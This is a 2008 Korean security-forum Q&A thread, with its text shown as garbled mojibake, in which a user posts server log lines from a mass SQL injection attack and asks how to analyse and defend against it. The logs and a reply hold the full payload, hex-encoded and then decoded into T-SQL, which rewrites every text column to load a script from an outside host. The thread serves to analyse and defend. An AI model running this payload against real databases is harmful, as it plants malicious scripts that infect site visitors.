Å©·¡Å· ÇÇÇØ

 423, 10/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   youngman0707
   sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382 [º¹»ç]


%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20AnD%20''=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=

  Hit : 3789     Date : 2008/11/10 03:27



    
youngman0707 Á¦°¡ Áö½ÄÀ̾è¾Æ¼­ ..ÀÌ·±°Å¹ß»ýÇßÀ»¶§..¾î¶»°Ô ºÐ¼®..±×¸®°í º¸¾ÈÇؾߵǴÂÁö ..°í¼ö´ÔµéÀÇ Àâ´ÙÇÑ
ÇѸ»¾¹ºÎŹµå¸³´Ï´Ù..

Àâ´ÙÇÑ ÇѸ»¾¹ÀÌ Àú¿¡°Õ Å«ÈûÀ̵˴ϴÙ..
¿À´Ãµµ Áñ°Å¿î ÇϷ纸³»¼¼¿ä..
2008/11/10  
ÃʵùÇØÄ¿ ÈÉ..
ÄO¾Æ
Âü Çè³­Çϱ¸³ª..

ÄO phpÁ» ÇÒÁپ˾Æ?
<?
echo(urldecode("$str"));
?>

À§ ÀÌ»óÇÑ ¹®ÀÚ¿­À» ¿ä±â $str ÀÎÀÚ·Î Àü´ÞÇϸé Á» ¸¶À½ÀÌ ¾ÈÁ¤µÉ²¿¾ß
2008/11/10  
pr0sp3r Çì´õºÎºÐÀº ³¯¸®°í ½ÇÁ¦ °ø°Ý Äõ¸®´Â 0xºÎÅÍ Çí»ç°ªº¯Á¶ÈÄ urndecode Çϸé¾Æ·¡¿Í °°ÀÌ µË´Ï´Ù.<br />
<br />
%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'=
2008/11/11  
k1rha ¿äÁò ÀÌÄÚµå Á¤¸» ÀÚÁÖº¸°Ô µÇ³×¿ä ¤»¤» mass sql injection °ø°ÝÀä, ½ÇÁ¦·Î ¹æ¾î¹ýÀº ¿øõÀûÀ¸·Î sql injection ¹æ¾î¹ý°ú °°½À´Ï´Ù¸¸, mass sql ÀÇ È­µÎ°¡ µÈÀÌÀ¯´Â IDS IPS ¸¦ ¿ìȸ ÇÒ¼ö ÀÖ´Ù´Â Á¡ÀÔ´Ï´Ù. ÀÌÁ¡À» ºñ·ÔÇØ ¹æ¾î¹ýÀ» ¼³¸íµå¸®ÀÚ¸é ÇÊÅ͸µ ±¸¹®¿¡ mass sql ¸¸ÀÇ ±¸¹®À» ÇÊÅ͸µ ÇØÁÖ¸é µÈ´Ù°í ÇÏ´õ±º¿ä ... 2008/11/14  
243   ¿©¸§¹æÇп¡...itÄ·ÇÁ°°Àº°Å ÀÖ¾î¿ä..?[3]     momma1004
05/31 3788
242   Àú ÀÌ»óÇÑ°Ô °è¼Ó ±ò¸³´Ï´Ù ¤Ñ,.¤Ñ[11]     qkreoghks00
01/23 3788
  sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..[4]     youngman0707
11/10 3788
240   Á˼ÛÇѵ¥¿ä Áú¹®Á» -¤µ-[2]     jhgood
02/04 3791
239   Á¦ ÄÄÅÍ°¡ ÇØÅ· ´çÇߴµ¥ µµ¿ÍÁÖ¼¼¿ä...¤Ð¤Ð[5]     cybergap
07/03 3796
238   v.wom.conficker °¨¿°[1]     wlals813
06/02 3796
237   À½... svchost Áú¹®..[4]     -ÄÚ³­
11/07 3796
236   ´©±º°¡ Á¦ ÄÄ¿¡ ´Ù³à °¡´Â°Å °°½À´Ï´Ù. µµ¿Í ÁÖ¼¼¿ä[9]     tomokjjang
08/02 3802
235   ÄÄÇ»ÅÍ¿¡¼­ ÀڷḦ »©°¬¾ú´ÂÁö È®Àΰ¡´ÉÇϳª¿ä?[3]     ÀÀÅ­Çѳʱ¸¸®
09/28 3812
234   ¡Ú½ºÅäÄ¿ÇØÅ·¿¡ ´ëÇÑ Áú¹®ÀÔ´Ï´Ù °í¼ö´Ôµé ´äº¯ºÎŹµå¸³´Ï´Ù[5]     thouss
08/28 3818
233   ¹Ù¶÷Àdzª¶ó ´ëÇ¥ÀÛ....[10]     dlgmltjs2001
12/11 3818
232   À©µµ¿ì xp ºÎÆÃÈÄ ·Î±×ÀÎÇÑ´ÙÀ½ Æ®¶óºíÀÌ»ý±è´Ï´Ù..[5]     james89kim
08/31 3819
231   µµ½º°ø°Ý ´çÇÑ°Í °°Àºµ¥..[6]     ´ÙÅ©·¹ÀÎÁ®
12/26 3826
230   rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..     soarrr
07/04 3831
229   ÇØÅ· óÀ½ ¹è¿öº¾´Ï´Ù. ¾îÄÉÇؾßÇÏÁÒ?[2]     kjw1oo
03/04 3834
228   Å©·¡Å· ÇÇÇØ ¸¦ ´çÇß½À´Ï´Ù ![6]     zzangon7
07/29 3835
227     [re] ÇØÄ¿¿Í Å©·¡Ä¿     ori0433
11/19 3835
226   Áú¹®ÀÔ´Ï´Ù..À߾ƽôºР´äÁ»..[4]     ÇØÄ¿´ÞŸ³É
11/21 3842
225   ÁßÇб³¸¸È­ 4Æí Hello guta¿¡¼­[2]     lch32111
02/27 3850
224     ÇØÄ¿¿¡ ´ëÇØ ¾Ë±¸ ½Í¾î¿è~~^^ Àú Ãʺ¸¶ó¼­...     lala11
10/20 3852
[1][2][3][4][5][6][7][8][9] 10 ..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org